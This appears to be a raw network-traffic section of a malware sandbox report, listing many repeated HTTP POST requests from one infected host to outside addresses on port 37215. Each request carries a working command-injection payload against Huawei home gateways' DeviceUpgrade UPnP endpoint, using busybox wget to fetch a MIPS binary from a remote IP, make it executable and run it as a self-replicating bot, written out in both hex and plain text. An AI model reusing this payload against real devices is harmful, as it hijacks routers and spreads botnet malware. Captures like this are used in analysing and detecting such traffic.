                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:58.965634108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:59.417671919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:00.313577890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1048192.168.2.1539858197.162.147.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.707112074 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1049192.168.2.154993241.247.203.2537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716509104 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1050192.168.2.1545956197.94.1.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716547966 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1051192.168.2.1549000122.51.21.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:58.716629028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:58.965631008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:59.417711020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:56:00.281657934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
